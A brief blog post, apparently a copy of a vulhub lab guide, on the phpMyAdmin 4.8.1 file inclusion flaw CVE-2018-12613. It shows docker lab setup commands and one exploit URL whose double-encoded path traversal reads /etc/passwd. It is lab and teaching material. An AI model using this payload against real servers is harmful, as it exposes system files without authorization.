CVE-2018-12613

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the index.php, causing files iclusion vulnerabilitiy.

Setup

cd vulhub/phpmyadmin/cve-2018-12613
docker-compose up -d

After the environment starts,visit http://10.10.10.8:8080. The phpmyadmin is "config" mode,so we can login directly.

Exploit

Visit http://10.10.10.8:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd, the result indicates that the file inclusion vulnerability exist:

posted @ 2024-05-23 10:24 kalixcn 阅读(31) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CVE-2016-5734

· WooYun-2016-199433

· phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

· phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）（Kali）

· cve-2018-12613-PhpMyadmin后台文件包含漏洞

阅读排行：
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布：重大改进与新特性概览！
· AI与.NET技术实操系列（二）：开始使用ML.NET
· 单线程的Redis速度为什么快？

历史上的今天：
2023-05-23 Linux启动过程

公告

昵称： kalixcn
园龄： 1年10个月
粉丝： 1
关注： 6

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

阅读排行榜

评论排行榜

1. Hadoop YARN ResourceManager 未授权访问(1)

kalixcn